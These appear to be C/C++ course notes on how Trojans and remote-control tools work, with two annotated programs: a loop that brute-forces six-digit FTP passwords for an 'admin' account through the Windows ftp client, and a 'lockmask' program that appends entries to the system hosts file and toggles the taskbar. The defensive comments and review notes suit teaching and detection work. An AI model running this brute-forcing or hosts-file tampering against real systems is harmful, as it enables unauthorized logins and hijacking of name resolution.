C/C++ Open Course Study Notes - Hacker code analysis and prevention, and wisdom podcast Study Notes
Hacker code Analysis and Prevention notes
[Course Introduction]
Apart from assembly, C/C++ is the language closest to the underlying machine. Mainstream operating systems such as Windows, Linux, iOS and Android are all written in C/C++, and many viruses and Trojans are therefore implemented in C/C++ as well. The purpose of the course is to explain, using C, how Trojans and various remote-control programs work and how to protect against them.
[Course knowledge points]
1. Trojan intrusion into the system;
2. Analysis of key behaviors after Trojans intrude into the host target;
3. Trusted port and port scanning technology;
4. Remote control implementation code;
5. Use of TCP, UDP, and firewall traversal technologies in malicious code;
6. 360 Network Security Protection implementation principle.
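/*
 * Course demo: drives the Windows command-line FTP client through a script
 * file and watches its output for a "230" (login accepted) reply while
 * stepping through six-digit numeric strings.
 *
 * What a defender should take from it:
 *  - The loop only works if the server accepts an unlimited number of login
 *    attempts for one account. Account lockout or per-source throttling
 *    removes that premise, and so does a password that is not six digits.
 *  - On the server it appears as a long run of failed logins (530 replies)
 *    for a single user from a single address, which is easy to alert on.
 *  - Plain FTP carries credentials in cleartext, and this program also leaves
 *    the current candidate in a.txt in the working directory.
 */
#include <stdio.h>
#include <string.h>

/*
 * Script template handed to the FTP client.
 * NOTE(review): as printed on the page the template has two %s conversions
 * while three arguments are supplied, so the last argument (passwd) is never
 * formatted. The string is kept as printed.
 */
#define CONTENT "open %s\nuser\n%s\nbye\n"

/*
 * Write the FTP client script to "a.txt" in the current directory.
 *
 * ip, user, passwd: NUL-terminated strings substituted into CONTENT.
 * Returns 0 on success, -1 if the file cannot be opened or written.
 *
 * The original formatted into a 1024-byte stack buffer with sprintf(), which
 * overflows for long arguments; writing straight to the stream removes the
 * buffer and the overflow with it.
 */
int write_file(const char *ip, const char *user, const char *passwd)
{
    FILE *script = fopen("a.txt", "w");
    if (!script) {
        return -1;
    }

    int rc = 0;
    if (fprintf(script, CONTENT, ip, user, passwd) < 0) {
        rc = -1;
    }
    /* fclose() flushes, so a failure here means the script is incomplete. */
    if (fclose(script) != 0) {
        rc = -1;
    }
    return rc;
}

int main(void)
{
    /* The demo assumes the password consists of exactly six digits. */
    for (int i = 0; i < 1000000; i++) {
        char pass[100] = {0};
        sprintf(pass, "%06d", i); /* at most 11 characters for any int */

        if (write_file("192.168.101.138", "admin", pass) != 0) {
            continue;
        }

        FILE *client = _popen("ftp -n -s:a.txt", "r");
        if (!client) {
            /* The original dereferenced a NULL stream when the spawn failed. */
            continue;
        }

        /*
         * Read until end of output. Testing fgets() directly avoids the
         * feof() pattern, which processes a stale buffer after the last line.
         */
        char line[1024];
        int accepted = 0;
        while (fgets(line, sizeof line, client)) {
            if (strncmp(line, "230", 3) == 0) { /* 230 = login accepted */
                accepted = 1;
                break;
            }
        }

        /* Close the pipe on every path; the original leaked it on success. */
        _pclose(client);

        if (accepted) {
            printf("pass: %s\n", pass);
            return 0;
        }
    }
    return 0;
}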
Function:
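// Lockmask.cpp: defines the entry point of the application.
//
#include "stdafx.h"
#include "lockmask.h"

/*
 * Changing the application icon.
 * VS: replace the <project name>.ico file.
 * Qt:
 *   a. find an image in .ico format and rename it to myapp.ico
 *   b. create a text file myapp.rc containing
 *        IDI_ICON1 ICON DISCARDABLE "myapp.ico"
 *   c. add RC_FILE = myapp.rc to the myapp.pro file
 *   After rebuilding, the icon is changed.
 */
/*
 * VS2013: building without a dependency on the runtime DLLs, compatible with XP.
 *   Project -- Properties -- Configuration Properties -- General --
 *     Platform Toolset -- Windows XP
 *   Project -- Properties -- Configuration Properties -- C/C++ --
 *     Code Generation -- Runtime Library -- Multi-threaded (/MT)
 */
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <ShellAPI.h>
#pragma warning(disable: 4996)

/*
 * Query the Windows version.
 * The result stays in a local structure and is not returned or used.
 * NOTE(review): GetVersionEx is deprecated on current Windows; presumably the
 * warning pragma above is what lets this build - confirm.
 */
void getWinVersion()
{
    OSVERSIONINFO info;
    info.dwOSVersionInfoSize = sizeof(info);
    GetVersionEx(&info);
}

/*
 * Append text to <system directory>\drivers\etc\hosts.
 *
 * IP, domain: NUL-terminated strings passed to the format call.
 * Returns 0 on success, -1 if the path cannot be built, the file cannot be
 * opened, or the write fails.
 *
 * Entries in the hosts file override name resolution for the whole machine.
 * Writing there normally needs elevation, and file-integrity monitoring on
 * this path is a standard way to detect tampering.
 *
 * NOTE(review): as printed on the page the format string holds a single %s
 * while two arguments are supplied, so domain is not written. The string is
 * kept as printed.
 */
int setHosts(const char *IP, const char *domain)
{
    static const char suffix[] = "\\drivers\\etc\\hosts";

    char sysdir[MAX_PATH] = {0};
    UINT len = GetSystemDirectoryA(sysdir, sizeof(sysdir));
    /* 0 means failure; a value >= the buffer size means it did not fit. */
    if (len == 0 || len >= sizeof(sysdir))
        return -1;

    /*
     * The original used two 100-byte buffers, so a system directory near that
     * length overflowed path. Size the buffer for directory, separator and
     * suffix and verify before formatting.
     */
    char path[MAX_PATH + sizeof(suffix) + 1] = {0};
    if (len + 1 + sizeof(suffix) > sizeof(path))
        return -1;
    sprintf(path, "%s\\%s", sysdir, suffix);

    FILE *p = fopen(path, "a"); /* append, keeping existing entries */
    if (!p)
        return -1;

    /* Write directly to the stream instead of a fixed 1024-byte buffer. */
    int rc = (fprintf(p, "%s", IP, domain) < 0) ? -1 : 0;
    if (fclose(p) != 0)
        rc = -1;
    return rc;
}

/*
 * Return the parent of the window reported by user32's GetTaskmanWindow,
 * which the page treats as the taskbar handle, or NULL on failure.
 *
 * GetTaskmanWindow is looked up at run time with GetProcAddress rather than
 * called through a header declaration.
 */
HWND getTask()
{
    typedef HWND (WINAPI *PROCGETTASKMANWND)(void);

    HMODULE hUser32 = GetModuleHandleA("user32");
    if (!hUser32)
        return NULL;

    PROCGETTASKMANWND GetTaskmanWindow =
        (PROCGETTASKMANWND)GetProcAddress(hUser32, "GetTaskmanWindow");
    if (!GetTaskmanWindow)
        return NULL;

    HWND h = GetTaskmanWindow();
    if (!h)
        return NULL;
    return GetParent(h);
}

/*
 * Entry point: re-enables the taskbar window. The disabling call is kept
 * commented out, as on the page.
 */
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
                       _In_opt_ HINSTANCE hPrevInstance,
                       _In_ LPTSTR lpCmdLine,
                       _In_ int nCmdShow)
{
    HWND h = getTask();
    // EnableWindow(h, false); // set the taskbar to disabled
    if (h)
        EnableWindow(h, true); // set the taskbar to available
    return 0;
}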